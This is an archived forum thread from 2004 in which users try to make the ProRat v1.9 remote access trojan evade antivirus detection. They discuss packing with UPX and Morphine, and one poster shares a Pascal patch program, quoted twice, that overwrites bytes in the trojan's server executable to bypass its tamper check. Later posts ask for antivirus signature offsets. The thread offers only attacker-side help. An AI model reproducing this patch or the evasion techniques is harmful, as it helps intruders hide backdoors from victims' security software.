hi folks
I got the ProRat-v1.9 from proRAT crew , seems to be a good RAT, but their last version will not run if you modify the server.exe
Let me explain it. their files ares detected by most Av, so first idea coming to my mind is packing, then morphine, then hex , but the client of proRAT detects that the server is modified and does not connect to it : / this is the free/public version . I guess some changes need to be done to the client.exe , but i dont know what, nor where
Anyone know about this issue ? I browsed the forum, found nothing similar to this topic yet
appreciate your help
Full Version: Pro Rat V1.9
Its strange but morphin-ing the files/packing might be corrupting the server ... just an idea thoguh. How do u hex tthem? mind explaining (even in private) coz that might be the reason its happening
well as far as the morphin goes, its kinda of random process every time, so it might wirk eventually (it did on some other .exe i used)
upx and morphin together dont help ( mcafee detects it ), unless i cant use them properly =) this can be the case ^^
Yall need to take a look in the Trojan/Viri section. There are tuts that will explain all your questions..
Yes, There is a crack It Is here
| CODE |
| program ProPatch; {$APPTYPE CONSOLE} uses Windows; var Buffer : Pointer; Handle, Taille : Cardinal; begin WriteLn('Crack pour serveurs de ProRat1.9 R1 par chti hack'); Handle := _lopen(PChar(ParamStr(1)), OF_READWRITE); if Handle <> INVALID_HANDLE_VALUE then begin Taille := GetFileSize(Handle, nil); Buffer := Pointer(LocalAlloc(0, Taille)); _lread(Handle, Buffer, Taille); _llseek(Handle, 0, FILE_BEGIN); PCardinal(Cardinal(Buffer) + $02AB24)^ := $005BF1F6; PByte(Cardinal(Buffer) + $029E31)^ := $74; PByte(Cardinal(Buffer) + $02A171)^ := $74; _lwrite(Handle, Buffer, Taille); _lclose(Handle); end else WriteLn('Impossible d''ouvrir le fichier'); end. |
thanks for the answers
@Eyeless
i do and still do , always good material and information going through that section. the server which was created was made undetectable, but the pro rat client of the free version detects that its not the original .exe
@gjohal
thanks for the progz and the code extract, hope it helps me out
I have expirenced this with a couple RATs. Most notably the Beast rat (2.06) which will not run if the exe has been edited. Probably some sort or checksum checking to prevent modification.
QUOTE(gjohal @ Sep 25 2004, 06:15 AM)
Yes, There is a crack It Is here
Grab the patch
CODE
program ProPatch;
{$APPTYPE CONSOLE}
uses
Windows;
var
Buffer : Pointer;
Handle, Taille : Cardinal;
begin
WriteLn('Crack pour serveurs de ProRat1.9 R1 par chti hack');
Handle := _lopen(PChar(ParamStr(1)), OF_READWRITE);
if Handle <> INVALID_HANDLE_VALUE then
begin
Taille := GetFileSize(Handle, nil);
Buffer := Pointer(LocalAlloc(0, Taille));
_lread(Handle, Buffer, Taille);
_llseek(Handle, 0, FILE_BEGIN);
PCardinal(Cardinal(Buffer) + $02AB24)^ := $005BF1F6;
PByte(Cardinal(Buffer) + $029E31)^ := $74;
PByte(Cardinal(Buffer) + $02A171)^ := $74;
_lwrite(Handle, Buffer, Taille);
_lclose(Handle);
end else WriteLn('Impossible d''ouvrir le fichier');
end.
{$APPTYPE CONSOLE}
uses
Windows;
var
Buffer : Pointer;
Handle, Taille : Cardinal;
begin
WriteLn('Crack pour serveurs de ProRat1.9 R1 par chti hack');
Handle := _lopen(PChar(ParamStr(1)), OF_READWRITE);
if Handle <> INVALID_HANDLE_VALUE then
begin
Taille := GetFileSize(Handle, nil);
Buffer := Pointer(LocalAlloc(0, Taille));
_lread(Handle, Buffer, Taille);
_llseek(Handle, 0, FILE_BEGIN);
PCardinal(Cardinal(Buffer) + $02AB24)^ := $005BF1F6;
PByte(Cardinal(Buffer) + $029E31)^ := $74;
PByte(Cardinal(Buffer) + $02A171)^ := $74;
_lwrite(Handle, Buffer, Taille);
_lclose(Handle);
end else WriteLn('Impossible d''ouvrir le fichier');
end.
Grab the patch
It doesnt work with ProRat 1.9 FiX1
hence the fix perhaps ?
it works but it's not undectable,now i can rename the server file.
QUOTE(DaywalkerX @ Oct 7 2004, 06:53 PM)
it works but it's not undectable,now i can rename the server file.
this patch give u the possibility to modificate the server, it's not an undetect patch
i know under the patch gjohal has posted
this doesn't work for me antivir detect my server file as backdoor.
QUOTE
this doesn't work for me antivir detect my server file as backdoor.
anybody Found Offsets To change !!!!!
The Signs !!
The Signs !!
this undetectable serv has bugs and doenst work :/
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
